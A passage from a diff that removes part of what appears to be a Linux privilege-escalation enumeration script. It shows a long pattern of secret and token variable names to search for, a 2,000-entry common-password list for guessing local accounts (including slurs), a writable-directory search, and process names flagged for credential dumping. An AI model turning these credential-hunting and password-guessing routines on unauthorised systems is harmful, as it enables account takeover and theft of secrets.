REBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER|GOOGLE
_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER|MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NP
M_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET|OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY|S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETA
CCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY|SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|V
AULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS|VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY" - -top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger 
mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston -snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker 
darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar -stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia 
sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade -redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 
cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland -nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou 
sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer -katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno 
holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar -charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden 
fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals -andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot 
eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive -plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude"
-PASSTRY="2000" #Default num of passwds to try (all by default)
-
-if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this
-SEDOVERFLOW=true
-for grp in `groups $USER | cut -d ":" -f2`; do
- wgroups="$wgroups -group $grp -or "
-done
-wgroups="`echo $wgroups | rev | cut -c5- | rev`"
-while $SEDOVERFLOW; do
- #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort`
- #if [ "$MACPEAS" ]; then
- WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort` #OpenBSD find command doesn't have "-writable" option
- #else
- # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort`
- #fi
- Wfolders=`printf "$WF" | tr '\n' '|'`"|[^\*]\ \*"
- Wfolder="`printf "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`"
- printf "test\ntest\ntest\ntest"| sed -E "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" >/dev/null 2>&1
- if [ $?
-eq 0 ]; then
- SEDOVERFLOW=false
- else
- MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1
- fi
-done
-
-notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$"
-
-TIMEOUT=`which timeout 2>/dev/null`
-GCC=`which gcc 2>/dev/null`
-
-pathshG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/dnsmap-bulk.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/lesspipe.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/testacg.sh|/testlahf.sh|/url_handler.sh"
-
-notBackup="/tdbbackup$|/db_hotbackup$"
-
-cronjobsG=".placeholder|0anacron|0hourly|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart"
-cronjobsB="centreon"
-
-processesVB="jdwp|tmux |screen |--inspect|--remote-debugging-port"
-processesB="knockd"
-processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:"
-
-mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier"
-
-profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|gawk.csh|gawk.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|Z97-byobu.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh"
-
